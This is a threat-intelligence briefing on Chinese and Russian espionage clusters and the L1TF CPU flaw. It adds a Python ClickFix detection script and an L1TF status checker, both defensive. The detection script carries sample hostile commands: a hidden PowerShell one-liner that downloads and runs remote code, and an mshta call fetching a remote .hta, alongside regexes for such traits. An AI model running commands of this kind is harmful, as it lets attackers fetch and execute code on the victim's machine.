Daily BlueTeamSec Briefing

September 25, 2025

This briefing covers security developments from 0400 to 0600 UTC on Thursday, September 25, 2025, based on five articles from our threat intelligence feeds.

Threat Intelligence.

Attribution challenges continue to complicate our understanding of Chinese state-sponsored operations. New analysis shows that Salt Typhoon partially overlaps with several separately tracked clusters, including OPERATOR PANDA, RedMike, UNC5807, and GhostEmperor, so indicators and TTPs published under any one of those names should not be assumed to cover the whole activity set. Three Chinese companies have been identified as suppliers of products and services to these interconnected threat clusters.

The Russian APT group COLDRIVER (also tracked as Star Blizzard and Callisto) has expanded its tactics beyond traditional credential phishing and is now running ClickFix campaigns: lure pages that pose as a verification or "fix" step and instruct the victim to paste a command into the Windows Run dialog, so the payload executes under the user's own account without an exploit. Two new malware families were observed in these campaigns, a downloader tracked as BAITSWITCH and a PowerShell backdoor tracked as SIMPLEFIX. The group continues to target members of Russian civil society, NGOs, think tanks, and human rights defenders.
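As an added example (not part of the briefing and not taken from any vendor report on COLDRIVER), the following Python shows the two places a defender can look for a ClickFix execution: process-creation telemetry, where the pasted command appears as an interpreter spawned by explorer.exe, and the per-user RunMRU registry key, which records Run-dialog history. The event fields, the heuristics and the sample data are constructed for illustration; they are generic ClickFix traits, not indicators for BAITSWITCH or SIMPLEFIX.

```python
"""ClickFix triage over process-creation events and Run-dialog history.

Added example, not taken from the briefing or from any vendor report.
The event fields, regexes and sample data are constructed for illustration;
map the fields to your own telemetry (for example Sysmon Event ID 1 and a
registry collection of HKCU\\...\\Explorer\\RunMRU).
"""
import re
from dataclasses import dataclass

# Interpreters a ClickFix lure typically tells the victim to paste into Win+R.
RUN_DIALOG_INTERPRETERS = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "rundll32.exe",
    "wscript.exe", "cscript.exe", "msiexec.exe", "curl.exe",
}

# Generic traits of clipboard-pasted one-liners (assumed heuristics, not IOCs).
SUSPICIOUS_PATTERNS = [
    (r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s", "encoded command"),
    (r"(?i)-w(indowstyle)?\s+hidden", "hidden window"),
    (r"(?i)\biex\b|invoke-expression", "dynamic eval"),
    (r"(?i)downloadstring|invoke-webrequest|\biwr\b|\bcurl\b", "remote fetch"),
    (r"(?i)https?://", "url in command"),
    (r"(?i)mshta(\.exe)?\s+https?://", "mshta remote"),
    (r"(?i)-nop\b|-noprofile\b", "no profile"),
    (r"(?i)-(ep|executionpolicy)\s+bypass", "execution policy bypass"),
]


@dataclass
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def command_indicators(command: str) -> list:
    """Names of the heuristics that match a command line, in table order."""
    return [name for pattern, name in SUSPICIOUS_PATTERNS if re.search(pattern, command)]


def triage_process_event(ev: ProcessEvent) -> dict:
    """Score one process-creation event.

    A Run-dialog launch shows up as explorer.exe spawning an interpreter; on its
    own that is common admin behaviour, so the verdict also needs command-line
    traits before it becomes 'suspicious'.
    """
    run_dialog = (_basename(ev.parent_image) == "explorer.exe"
                  and _basename(ev.image) in RUN_DIALOG_INTERPRETERS)
    hits = command_indicators(ev.command_line)
    if run_dialog and hits:
        verdict = "suspicious"
    elif hits:
        verdict = "review"
    else:
        verdict = "benign"
    return {"run_dialog_launch": run_dialog, "indicators": hits, "verdict": verdict}


def runmru_entries(values: dict) -> list:
    """Run-dialog history, most recent first.

    `values` mirrors the RunMRU key: letter-named REG_SZ values whose data ends
    in '\\1', plus 'MRUList' whose characters give the most-recent-first order.
    """
    history = []
    for letter in values.get("MRUList", ""):
        raw = values.get(letter)
        if raw is None:
            continue
        history.append(raw[:-2] if raw.endswith("\\1") else raw)
    return history


def triage_runmru(values: dict) -> list:
    """Attach indicator names to each RunMRU command (empty list when clean)."""
    return [{"command": cmd, "indicators": command_indicators(cmd)}
            for cmd in runmru_entries(values)]


# Constructed sample data (not real telemetry; hosts use the reserved .invalid TLD).
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -w hidden -nop -ep bypass -c \"iex (New-Object "
                 "Net.WebClient).DownloadString('http://example.invalid/v')\""),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 "cmd.exe /c ipconfig /all"),
    ProcessEvent(r"C:\Windows\System32\services.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -enc SQBFAFgA"),
]
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": r"notepad\1",
    "b": r"\\fileserver\share\1",
    "c": r"mshta https://example.invalid/verify.hta\1",
}

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(triage_process_event(ev))
    for entry in triage_runmru(SAMPLE_RUNMRU):
        print(entry)
```

The RunMRU check matters because the pasted command survives there even when process telemetry was not being collected at the time; the process-creation check is the one to turn into a live detection, keeping the explorer.exe parent condition so ordinary scripted administration does not drown it in noise.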

A China-nexus threat cluster designated UNC5221 has been conducting espionage campaigns since at least March 2025 using BRICKSTORM, a Go-based backdoor. The actors target legal services, SaaS providers, and technology companies in the United States, exploit zero-day vulnerabilities in network appliances for initial access, and keep their persistence on appliances that typically cannot run EDR, which helps explain an average dwell time of 393 days before detection.

Vulnerabilities.

Google's Project Rain has published a detailed technical overview of L1TF (L1 Terminal Fault, the speculative-execution flaw also known as Foreshadow) on Intel Skylake and older CPU architectures. A load that faults on a page-table entry marked not-present still speculatively forwards whatever the L1 data cache holds for the physical address encoded in that entry, so an attacker who controls a PTE, most notably a malicious guest under a hypervisor, can read host data resident in L1D. The OS-level case is closed by PTE inversion, but the guest-to-host case still depends on flushing L1D on VM entry and on the SMT configuration, which is why the flaw remains a concern for organizations running legacy Intel hardware as virtualization hosts.
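As an added example (not part of the briefing and not from the Google write-up), the following Python reads the status the Linux kernel exposes for L1TF and decides whether it is adequate for a host that runs untrusted guests. The status strings are the formats the kernel emits in /sys/devices/system/cpu/vulnerabilities/l1tf; the verdict thresholds are this example's own assumptions.

```python
"""Read the kernel's L1TF status and say whether it is good enough for a VM host.

Added example, not from the briefing or from Google's write-up. The status
strings follow the formats the Linux kernel emits (arch/x86/kernel/cpu/bugs.c)
in /sys/devices/system/cpu/vulnerabilities/l1tf; the verdict levels are this
example's own choices.
"""
from pathlib import Path
from typing import Optional

SYSFS_L1TF = Path("/sys/devices/system/cpu/vulnerabilities/l1tf")


def classify_l1tf(status: str, hosts_vms: bool = True) -> dict:
    """Map one sysfs status line to a verdict.

    PTE inversion closes the bare-metal hole (a local process reading L1D via a
    crafted not-present PTE). A hypervisor host additionally needs L1D flushed
    on VM entry, and an SMT sibling can refill L1D after the flush, so the part
    after 'VMX:' decides the guest-to-host exposure.
    """
    s = status.strip()
    if s == "Not affected":
        return {"level": "ok", "reason": "CPU not affected"}
    if s == "Vulnerable":
        return {"level": "vulnerable", "reason": "no PTE inversion: local users can read L1D"}
    if not s.startswith("Mitigation: PTE Inversion"):
        return {"level": "unknown", "reason": "unrecognised status: " + s}
    if "VMX:" not in s or not hosts_vms:
        # No VMX state is reported when KVM is not loaded; nothing guest-facing to assess.
        return {"level": "ok", "reason": "PTE inversion in place; no guest-to-host path to assess"}
    vmx = s.split("VMX:", 1)[1].strip()
    if vmx.startswith(("EPT disabled", "flush not necessary")):
        return {"level": "ok", "reason": "VMX: " + vmx}
    if vmx.startswith("vulnerable"):
        return {"level": "vulnerable",
                "reason": "no L1D flush on VM entry: a malicious guest can read host L1D"}
    if vmx.startswith(("conditional cache flushes", "cache flushes")):
        if "SMT vulnerable" in vmx:
            return {"level": "at-risk",
                    "reason": "L1D flushed on VM entry but SMT enabled: a sibling thread can refill it"}
        return {"level": "ok", "reason": "L1D flush on VM entry and SMT disabled"}
    return {"level": "unknown", "reason": "unrecognised VMX state: " + vmx}


def read_host_status() -> Optional[dict]:
    """Classify the running host, or None when the sysfs file is absent (non-x86, old kernel)."""
    if not SYSFS_L1TF.is_file():
        return None
    return classify_l1tf(SYSFS_L1TF.read_text())


if __name__ == "__main__":
    print(read_host_status() or "no l1tf status exposed by this kernel")
```

The point to take from it is that "Mitigation: PTE Inversion" alone is only the bare-metal answer; on a virtualization host the "VMX:" suffix and the SMT state carry the actual exposure, and a host reporting "SMT vulnerable" still needs a decision about disabling hyperthreading or accepting the risk for the guests it runs.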

Tools.

The Department of War has announced a new cybersecurity risk management construct. Specific details of the framework were not available at the time of writing because the department's official announcement could not be retrieved by our feeds.
